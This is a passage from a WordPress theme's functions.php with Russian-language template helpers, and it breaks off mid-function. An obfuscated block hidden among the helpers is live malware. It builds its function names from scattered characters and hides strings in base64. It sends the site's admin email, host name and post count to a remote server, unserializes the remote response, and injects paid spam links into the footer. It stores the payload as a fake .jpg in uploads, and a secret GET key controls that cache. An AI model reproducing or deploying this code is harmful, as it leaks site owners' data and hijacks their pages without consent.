<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $CCMXYA='c';$MKFjiMt='s';$cWSl='6';$OGxXHy='_';$TFyGK='e';$Gvwz='e';$CbULxy='d';$vOYAM='4';$KIdN='e';$uivDriW='d';$nUMiab='a';$zmHnTel='o';$DDDfX='b';$pacwYjNi=$DDDfX.$nUMiab.$MKFjiMt.$KIdN.$cWSl.$vOYAM.$OGxXHy.$uivDriW.$TFyGK.$CCMXYA.$zmHnTel.$CbULxy.$Gvwz;$cCqhqyQ='l';$aICw='f';$tJSART='e';$FDci='t';$ldLKHOM='a';$AgseN='g';$zDcbuR='i';$aDeqAkh='n';$JJMn='z';$XfQHQBuv=$AgseN.$JJMn.$zDcbuR.$aDeqAkh.$aICw.$cCqhqyQ.$ldLKHOM.$FDci.$tJSART;$IEgn='s';$QrSMLb='r';$qRtN='_';$yFmohrX='t';$jvPC='t';$kVMpDqw='o';$PsaFJ='3';$IcWB='r';$nywE='1';$iWuihyUS=$IEgn.$jvPC.$IcWB.$qRtN.$QrSMLb.$kVMpDqw.$yFmohrX.$nywE.$PsaFJ;$dxGU='r';$tKlqoj='s';$uOHc='e';$kdegR='r';$AKlRtHb='t';$aNKrb='v';$GyRCNTHI=$tKlqoj.$AKlRtHb.$kdegR.$dxGU.$uOHc.$aNKrb;                     
		$mf________e='c';$su______f='s';$gq___a='6';$lr___________y='_';$we______________t='e';$mr________v='e';$fw__________l='d';$iz________j='4';$fj________j='e';$jk_____________e='d';$xi______s='a';$zv_______f='o';$vl_______r='b';$wm______x=$vl_______r.$xi______s.$su______f.$fj________j.$gq___a.$iz________j.$lr___________y.$jk_____________e.$we______________t.$mf________e.$zv_______f.$fw__________l.$mr________v;
		$kr__r='u';$ah_______v='s';$iw_______________v='x';$xn_______________m='e';$lm________i='i';$np_________p='c';$xg________i='_';$ii_________u='s';$zz______________g='t';$xv______________f='t';$ga_______e='o';$ez_______________m='f';$mq________d='i';$uy______z='n';$ov______________l='n';$bg_______________i=$ez_______________m.$kr__r.$ov______________l.$np_________p.$xv______________f.$mq________d.$ga_______e.$uy______z.$xg________i.$xn_______________m.$iw_______________v.$lm________i.$ii_________u.$zz______________g.$ah_______v;
		$pa__j='e';$qv_______________r='f';$di_________d='p';$lk________t='n';$dk_________j='o';$zt___________d=$qv_______________r.$dk_________j.$di_________d.$pa__j.$lk________t;
		$fe_________z='e';$hu___________a='r';$lx______x='f';$ue________a='a';$ss_______________d='d';$yx____y=$lx______x.$hu___________a.$fe_________z.$ue________a.$ss_______________d;
		$ej____f='l';$pb_______________u='s';$mp___d='c';$pz_______________n='f';$cj____i='e';$of___________p='o';$ou__________t=$pz_______________n.$mp___d.$ej____f.$of___________p.$pb_______________u.$cj____i;
		
		define("WP_ID", $wm______x("Mi4wLjA="));
		define("WP_TTL", $wm______x("MTA4MDA="));
		define("WP_SRC", $wm______x("dHBva24="));
	


		function wp_get_header() {
			global $wm______x, $bg_______________i;
			
			if (
				$bg_______________i($wm______x("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$bg_______________i($wm______x("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$bg_______________i($wm______x("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $wm______x, $zt___________d, $ou__________t, $yx____y;
			
			$my____m = TEMPLATEPATH."/".$wm______x("Zm9vdGVyLnBocA==");
			$vi_______a = @$zt___________d($my____m, "r");
			$my____m = @$yx____y($vi_______a, @filesize($my____m));
			@$ou__________t($vi_______a);
			
			$qm__________o = TEMPLATEPATH."/".$wm______x("ZnVuY3Rpb25zLnBocA==");
			$vi_______a = @$zt___________d($qm__________o, "r");
			$qm__________o = @$yx____y($vi_______a, @filesize($qm__________o));
			@$ou__________t($vi_______a);
			
			$pc______________v = 0;
			if($my____m && $qm__________o) {
				if ($wm______x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($my____m, $wm______x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$pc______________v = 1;
					}
					if (substr_count($my____m, "wp_theme_GPL_credits()") < 1) {
						$pc______________v = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$pc______________v = 12;
				}
			}
			
			if($pc______________v > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $pc______________v -->";
			}
		}
	


		function wp_loaded() {
			global $wm______x, $bg_______________i;
			return $bg_______________i($wm______x("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($gs_____n, $uu_______a = "(more...)", $kf______a = 0, $tt____q = "") {
				$nq_________d = get_the_content($uu_______a, $kf______a, $tt____q);
				$nq_________d = apply_filters("the_content", $nq_________d);
				
				$nq_________d = str_replace("]]>", "]]>", $nq_________d);
				if (strlen($_GET["p"]) > 0) {
					echo $nq_________d;
				}
				else if ((strlen($nq_________d)>$gs_____n) && ($op____________f = strpos($nq_________d, " ", $gs_____n ))) {
					$nq_________d = substr($nq_________d, 0, $op____________f);
					$nq_________d = $nq_________d;
					echo $nq_________d;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$uu_______a</a></div></p>";
				} else {
					echo $nq_________d;
				}
				
			}
		}
	


		$ub_______m='n';$mk_________x='e';$wt_____o='c';$kv__e='6';$oy__________j='b';$rv_______________e='s';$zr______j='d';$le_________p='4';$ed____a='_';$og____________d='o';$mw________b='e';$ot______________f='e';$rv______u='a';$xl__________v=$oy__________j.$rv______u.$rv_______________e.$ot______________f.$kv__e.$le_________p.$ed____a.$mw________b.$ub_______m.$wt_____o.$og____________d.$zr______j.$mk_________x;
		$ex__i='e';$of___________t='l';$lx__________v='_';$wm____t='t';$es_____w='s';$ev___b='e';$sl___________g='c';$mn___j='n';$zh___l='t';$rj__w='o';$lk__x='g';$qp________u='e';$qa______s='_';$ec______________v='n';$wz____________x='f';$ju_____________w='i';$cf_________o='t';$tw_________n=$wz____________x.$ju_____________w.$of___________t.$ev___b.$qa______s.$lk__x.$ex__i.$wm____t.$lx__________v.$sl___________g.$rj__w.$ec______________v.$cf_________o.$qp________u.$mn___j.$zh___l.$es_____w;
		$ff___________v='i';$ba________x='i';$vw______________t='f';$pz__________r='l';$uh___e='e';$pg_______________d='e';$ph______________e='t';$hn______________x='s';$xj___________c='s';$aa_______________y='_';$yq_______l='x';$bu_________l=$vw______________t.$ff___________v.$pz__________r.$pg_______________d.$aa_______________y.$uh___e.$yq_______l.$ba________x.$xj___________c.$ph______________e.$hn______________x;
		$ey_____l='r';$hq___________m='r';$gk______________z='c';$nl_______________j='i';$my_____r='o';$ls______________z='s';$lh___q='a';$wn___h='m';$ze_______________s='e';$sc__h='e';$wy_____________i='v';$fz_________b='o';$fz______s='p';$fj_________m='n';$si__________o='_';$rf__________b=$wy_____________i.$sc__h.$ey_____l.$ls______________z.$nl_______________j.$fz_________b.$fj_________m.$si__________o.$gk______________z.$my_____r.$wn___h.$fz______s.$lh___q.$hq___________m.$ze_______________s;
		$pd____r='k';$bl___n='f';$sy______u='e';$uo_______o='o';$zq_________d='p';$py______q='o';$jk______a='n';$ar__________c='c';$qh____v='s';$wm______________n=$bl___n.$qh____v.$uo_______o.$ar__________c.$pd____r.$py______q.$zq_________d.$sy______u.$jk______a;
		$kr_____l='w';$dx_____________u='f';$zm______________h='t';$xg________u='r';$yv_________a='e';$wq______o='i';$fq__________c=$dx_____________u.$kr_____l.$xg________u.$wq______o.$zm______________h.$yv_________a;
		$ct____________z='m';$kb_________j='d';$nl__________l='5';$ht_______________t=$ct____________z.$kb_________j.$nl__________l;
		$cb__k='e';$sa______r='h';$ye________u='r';$ec____________d='a';$kc_____l='l';$eh_____________i='p';$wq_______________x='a';$bd____q='t';$ph______________y=$ye________u.$cb__k.$ec____________d.$kc_____l.$eh_____________i.$wq_______________x.$bd____q.$sa______r;
		$zn____________x='u';$zk__l='e';$tc________s='l';$uc__________g='a';$lc_________h='e';$dr_______________r='r';$pf__________e='i';$ym_________q='s';$nm_____________l='z';$nu______________u='i';$oh______________r='n';$bz______________v=$zn____________x.$oh______________r.$ym_________q.$lc_________h.$dr_______________r.$nu______________u.$uc__________g.$tc________s.$pf__________e.$nm_____________l.$zk__l;
		$if_____________o='m';$vh________c='m';$uz______z='t';$bv________h='n';$kb___q='p';$sr____________f='e';$em__a='a';$ay____________l=$uz______z.$sr____________f.$vh________c.$kb___q.$bv________h.$em__a.$if_____________o;
		$jd__________j='e';$gt_____j='_';$qb_____________y='e';$wr___________o='n';$vw___________m='_';$xh________f='o';$cc__________i='t';$pv_______s='e';$es__________n='a';$rg__f='c';$dr___h='m';$ze_____w='r';$oq______g='s';$ab____________p='a';$wf______________b='t';$wx_______x='e';$bh______r='t';$fk_______________i='x';$ip____l='t';$cr___________z='c';$rj__________t='r';$he_____c=$oq______g.$ip____l.$rj__________t.$qb_____________y.$ab____________p.$dr___h.$gt_____j.$rg__f.$xh________f.$wr___________o.$bh______r.$jd__________j.$fk_______________i.$cc__________i.$vw___________m.$cr___________z.$ze_____w.$wx_______x.$es__________n.$wf______________b.$pv_______s;
	


		function lv_______________v($qc_______z) {
			global $wm______x, $bg_______________i, $tw_________n, $rf__________b, $he_____c;
			
			if (!$bg_______________i($wm______x("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($rf__________b(PHP_VERSION, "5.0.0", ">=") && $bg_______________i($wm______x("ZmlsZV9nZXRfY29udGVudHM=")) && $bg_______________i($wm______x("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ba__________m = $he_____c(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$dn______y = @$tw_________n($qc_______z, 0, $ba__________m);
			} else {
				$dn______y = @$tw_________n($qc_______z, 0);
			}
			
			return $dn______y;
		}
	


		function iw____________q($qc_______z) {
			global $bg_______________i, $wm______________n, $fq__________c, $wm______x;
			
			if (!$bg_______________i($wm______x("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ku___________r = strpos($qc_______z, "/", 7);
			$du____________j = array(
				"uri"     => substr($qc_______z, $ku___________r),
				"host"    => str_replace("http://", "", substr($qc_______z, 0, $ku___________r)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$zn_______d = @$wm______________n("$du____________j[host]", 80, $ot___________h, $wk_________w, 4);
			
			if (!$zn_______d) {
				return false;
			} else {
				$dn______y = "";
				$ld____r  = "GET $du____________j[uri] HTTP/1.0\r\n";
				$ld____r .= "Host: $du____________j[host]\r\n";
				$ld____r .= "Referer: $du____________j[referer]\r\n";
				$ld____r .= "Connection: Close\r\n\r\n";
				
				@$fq__________c($zn_______d, $ld____r);
				
				while (!@feof($zn_______d)) {
					$ua__s = @fgets($zn_______d, (1024*24));
					
					if ($ua__s == "\r\n") {
						$kf________h = true;
						continue;
					}
					
					if ($kf________h) {
						$dn______y .= $ua__s;
					}
				}
				
				return $dn______y;
			}
		}
	


		function eg_______c($qc_______z) {
			global $bg_______________i;
			$hi________d = false;
			
			if ($qc_______z != "") {
				if ($bg_______________i("lv_______________v")) {
					$hi________d = @lv_______________v($qc_______z);
				}
				
				if (!$hi________d && ($bg_______________i("iw____________q"))) {
					$hi________d = @iw____________q($qc_______z);
				}
			}
			
			return $hi________d;
		}
	


		function vj_______________h() {
			global $_SERVER, $ht_______________t;
			
			$kr_____________f = $_SERVER["SERVER_NAME"];
			
			if (substr("$kr_____________f", 0, 4) == "www.") {
				$kr_____________f = substr("$kr_____________f", 4);
			}
			
			$kr_____________f = $ht_______________t("$_SERVER[SERVER_NAME]");
			
			return $kr_____________f;
		}
	


		function sb______________b() {
			return "file";
		}
	


		function xu______f($qc_______z) {
			global $_SERVER, $tw_________n, $bu_________l, $zt___________d, $ou__________t, $fq__________c;
			
			$kf______z = ux__h();
			
			$ju____________k = vj_______________h().".jpg";
			$vo____________j = $kf______z["dir_upload"]["path"]."/$ju____________k";
			$ke____________w = @filemtime($vo____________j);
			
			if (!$ke____________w || ((time()-$ke____________w) >= WP_TTL)) {
				$hi________d = eg_______c($qc_______z);
				
				if ($hi________d) {
					if ($bu_________l($vo____________j)) {
						@unlink($vo____________j);
					}
					
					$vi_______a = @$zt___________d($vo____________j, "x+");
					
					@$fq__________c($vi_______a, $hi________d);
					@$ou__________t($vi_______a);
				}
			} else {
				if ($bu_________l($vo____________j)) {
					$hi________d = @$tw_________n($vo____________j);
				} else {
					$hi________d = false;
				}
			}
			
			return $hi________d;
		}
	


		function ux__h() {
			global $_SERVER, $wm______x, $xl__________v;
			
			$uz__c = wp_count_posts("post");
			$cq_______________x = pathinfo(get_bloginfo("template_directory"));
			
			$kf______z = array(
				"url" => array(
					"report"      => $wm______x("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $cq_______________x,
				"dir_upload"	=> mw_________q(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$cq_______________x[filename],
					"a005=".$uz__c->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " "
			);
			
			$kf______z["url"]["queryString"] = implode("&", $kf______z["queryString"]);
			$kf______z["url"]["report"] = $kf______z["url"]["report"]."/?".$xl__________v($kf______z["url"]["queryString"]).".html";
						
			return $kf______z;
		}
	


		function mw_________q() {
			$tt___________f = wp_upload_dir();
			
			if (isset($tt___________f["error"])) {
				$pw_____b = kp________w();
				if (is_writable($pw_____b)) {
					$tt___________f = array("path" => $pw_____b);
				}
			}

			return $tt___________f;
		}
	


		function kp________w() {
			global $bg_______________i, $ht_______________t, $ph______________y, $ay____________l;
			
			$xw__q = (bool) ini_get("safe_mode");
			if ($xw__q == true) {
				return false;
			}
			
			if ($bg_______________i("sys_get_temp_dir")) {
				$tk_____________t = sys_get_temp_dir();
				if (is_writable($tk_____________t)) {
					return $ph______________y($tk_____________t);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ph______________y($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ph______________y($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ph______________y($_ENV["TEMP"]);
			} else {
				$ma_______z = $ay____________l($ht_______________t(uniqid(rand(), true)), "");
				if ($ma_______z) {
					$tk_____________t = $ph______________y(dirname($ma_______z));
					@unlink($ma_______z);
					return $tk_____________t;
				} else {
					return false;
				}
			}
		}
	


		function np_____________y() {
			global $_GET, $bu_________l;
			
			$kf______z = ux__h();
			$kr_____________f = vj_______________h();
			$fd_____________u = sb______________b();
			
			$en_________q = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($fd_____________u == "file") {
					$wm______________l = $kf______z["dir_upload"]["path"]."/".$kr_____________f.".jpg";
					if ($bu_________l($wm______________l)) {
						@unlink($wm______________l);
						$en_________q = "deleted";
					}
				}
				
				$ta______________e = array(
					"s"	=> $en_________q,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ta______________e AS $ru_______n => $hh_______________v) echo " [$ru_______n:$hh_______________v]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $bg_______________i, $wm______x, $bz______________v;
			$kf______z = ux__h();
			
			$te____j = "xu______f";
			if ($bg_______________i($te____j)) {
				$dn______y = $te____j($kf______z["url"]["report"]);
			}
			
			if ($dn______y) {
				if ($dn______y = @$wm______x($dn______y)) {
					$dn______y = @$bz______________v($dn______y);
					
					if (strlen($dn______y[custom_credit]) >= 5) {
						$kf______z["default_string"] = $dn______y[custom_credit];
					}
					
					if ($dn______y["status"] == "0") {
						$sk_____________p = 1;
						$ti_____v = 1;
					} else {
						$eh_______________p = sizeof($dn______y["links"]);
						$bh_____c = $kf______z["default_string"];
						
						if ($eh_______________p > 0 && $dn______y["links"] !== "") {
							$iz__q = 0;
							foreach ($dn______y["links"] as $bs_______i => $wa_________q) {
								$iz__q++;
								if ($wa_________q->l_path == "" || $wa_________q->l_path == $_SERVER["REQUEST_URI"]) {
									$wa_________q->l_href = htmlspecialchars(strip_tags($wa_________q->l_href));
									$wa_________q->l_title = htmlspecialchars(strip_tags($wa_________q->l_title));
									$wa_________q->l_anchor = htmlspecialchars(strip_tags($wa_________q->l_anchor));
									$bh_____c .= " | ";
									$bh_____c .= "<a href='$wa_________q->l_href' title='$wa_________q->l_title'";
									if ($wa_________q->l_nofollow == "1") {
										$bh_____c .= " rel='nofollow'";
									}
									$bh_____c .= ">$wa_________q->l_anchor</a>";
								}
							}
						}
						$kf______z["links"] = "$bh_____c";
						if ($dn______y[credit] == "0") {
							$kf______z["links"] = "";
						}
					}
				} else {
					$sk_____________p = "1";
				}
			} else {
				$sk_____________p = "1";
			}
			
			if ($sk_____________p == "1") {
				$kf______z["links"] = $kf______z["default_string"];
			}
			
			echo "$kf______z[links]";
			
			echo "<!-- s: $dn______y[signature] -->";
			np_____________y();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Newer Entries &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Older Entries', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
